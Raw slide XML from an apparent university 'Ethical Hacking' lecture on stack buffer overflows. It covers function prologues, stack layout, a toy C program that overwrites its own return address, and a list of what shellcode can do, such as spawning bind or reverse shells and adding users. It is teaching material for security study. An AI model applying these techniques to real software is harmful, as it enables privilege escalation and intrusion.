Target="../media/image75.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink84.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId9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emon-systems.org/man/chroot.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.daemon-systems.org/man/init.8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21.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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7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0.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml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11.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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5.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><Relationship Id="rId3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19.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink10.xml"/><Relationship Id="rId41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038600"/>
            <a:ext cx="7467600" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethical Hacking – Lecture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John Black                                       Fall 2020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1277" y="2487735"/>
            <a:ext cx="8647893" cy="194085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0x08048394 &lt;function+0&gt;:        push   %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ebp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// save %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ebp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0x08048395 &lt;function+1&gt;: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%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esp,%ebp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// set new %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ebp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from %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esp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0x08048397 &lt;function+3&gt;:        sub    $0x18,%esp    // make 24 bytes of room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						  // on stack for locals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0x0804839e &lt;function+10&gt;:       leave		  // clean up %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ebp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esp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0x0804839f &lt;function+11&gt;:       ret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400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr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27528" y="4921623"/>
            <a:ext cx="3119718" cy="91101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</a:rPr>
              <a:t>”leave” is equivalent to </a:t>
            </a:r>
          </a:p>
          <a:p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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebp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esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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 pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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4778186" y="4778188"/>
            <a:ext cx="3119718" cy="116955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</a:rPr>
              <a:t>the above would be a little different with canaries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, without the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector compiler option)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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at time of function() call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826740"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="295838" y="1648003"/>
          <a:ext cx="5136777" cy="47587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2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22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6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buffer2</a:t>
                      </a:r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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(and %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1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esp</a:t>
                      </a:r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)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0xfffff7f8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0xfffff7fc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0xfffff800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0xfffff804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buffer1</a:t>
                      </a:r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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0xfffff808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0xfffff80c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ourier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>sfp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saved %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>ebp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0xfffff810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ret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latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> ret </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>addr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0xfffff814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0x1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0xfffff818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0x2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0xfffff81c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0x3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0xfffff820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818094" y="1801906"/>
            <a:ext cx="30211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buffers 1 and 2 start out uninitialized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ordering on the stack is NOT guaranteed to follow order of declarations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ex3.c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endParaRPr lang="en-US" sz="32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c)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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char buffer1[8];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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   char buffer2[16];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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *ret;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32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ret = buffer1 + 16;    // set “ret” to point at the ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   (*ret) += 7;           // return 7 bytes later in text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3200" dirty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32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void main()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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> x;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32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  x =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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  function(1,2,3);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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  x = 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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr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62282" y="4312023"/>
            <a:ext cx="29314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we’re directly overwriting the return address to illustrate program-flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an attacker can’t do this of course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2913531" y="3343836"/>
            <a:ext cx="2232210" cy="1452283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Overflowing buffer1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079559"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="295838" y="1648003"/>
          <a:ext cx="5136777" cy="5129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2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22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6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buffer2</a:t>
                      </a:r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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(and %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1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esp</a:t>
                      </a:r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)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0xfffff7f8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0xfffff7fc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0xfffff800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0xfffff804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buffer1</a:t>
                      </a:r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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0xfffff808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0xfffff80c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ret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0xfffff810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ourier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>sfp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0xfffff814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latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> ret </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>addr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0xfffff818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0x1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0xfffff81c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0x2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0xfffff820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0x3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0xfffff824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818094" y="1801906"/>
            <a:ext cx="30211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data are copied into buffer1 and the data are more than 8 bytes, an overflow occurs into the fields below the buffer’s area on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When function returns, it will go to the overwritten address specified by the attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286004" y="3854824"/>
            <a:ext cx="277905" cy="2779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72875" y="3854823"/>
            <a:ext cx="277905" cy="2779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850780" y="3854823"/>
            <a:ext cx="277905" cy="2779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137651" y="3854823"/>
            <a:ext cx="277905" cy="2779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303934" y="4222377"/>
            <a:ext cx="277905" cy="2779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590805" y="4222376"/>
            <a:ext cx="277905" cy="2779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868710" y="4222376"/>
            <a:ext cx="277905" cy="2779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155581" y="4222376"/>
            <a:ext cx="277905" cy="2779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303934" y="4580965"/>
            <a:ext cx="277905" cy="2779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590805" y="4580964"/>
            <a:ext cx="277905" cy="2779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868710" y="4580964"/>
            <a:ext cx="277905" cy="2779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155581" y="4580964"/>
            <a:ext cx="277905" cy="2779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312899" y="4966447"/>
            <a:ext cx="277905" cy="2779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599770" y="4966446"/>
            <a:ext cx="277905" cy="2779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877675" y="4966446"/>
            <a:ext cx="277905" cy="2779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164546" y="4966446"/>
            <a:ext cx="277905" cy="2779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297134" y="5339565"/>
            <a:ext cx="277905" cy="2779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584005" y="5339564"/>
            <a:ext cx="277905" cy="2779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861910" y="5339564"/>
            <a:ext cx="277905" cy="2779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148781" y="5339564"/>
            <a:ext cx="277905" cy="2779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the ret </a:t>
            </a:r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we overflow a buffer, we can control the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extremely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> powerful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can jump to other parts of the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code that enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>privs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code that prints sensitive info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code that just crashes (crash DNS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eg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Can jump to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>own code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assuming we can inject code… usually possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is usually called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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Shellcode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Depending on the context, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” can do various things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spawn a shell (that’s where the name comes from)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This assumes you have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attached to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This assumes your injection doesn’t terminate with ^D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add a user to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run a specific program (like l33t)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just spawn a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fork or exec?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might as well exec since we don’t usually care about the parent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setresuid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Not necessary here (since I gave you an old dash that doesn’t drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), but keep in mind for other shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exit after exec?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commonly seen, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has the option, but seems unnecessary to me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>what format should code be in?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Machine code, no question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Digression on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() takes three arguments:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filename of executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary executable or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#!interpreter [optional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will be derived from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> later by the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> points to an array of pointers, terminated by NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>usually in the form of key=value strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> points to an array of pointers, terminated by NULL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415921163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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() digression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filename has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bit on and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not mounted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nosuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The calling process is not being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PTRACEd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The file is not a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>then set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exec’ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process to the owner of the program file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most attributes of the caller are inherited by the newly-executed program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But only the calling thread is preserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404788748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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() counts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> entries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43848"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is computed in the kernel by examining the number of non-NULL pointers in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> array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00" y="2832640"/>
            <a:ext cx="70485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44365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Biggest Vulnerability of 1997-2007 (or so)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A lot of mitigation nowadays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But still relevant since</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Older systems abound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are ways around the mitigation sometimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are now more popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web-based attacks which are often easier to find, understand, and exploit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shellcode.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()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761570"/>
            <a:ext cx="8153400" cy="4495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Write in C, compile, extract assembly into machine code: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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
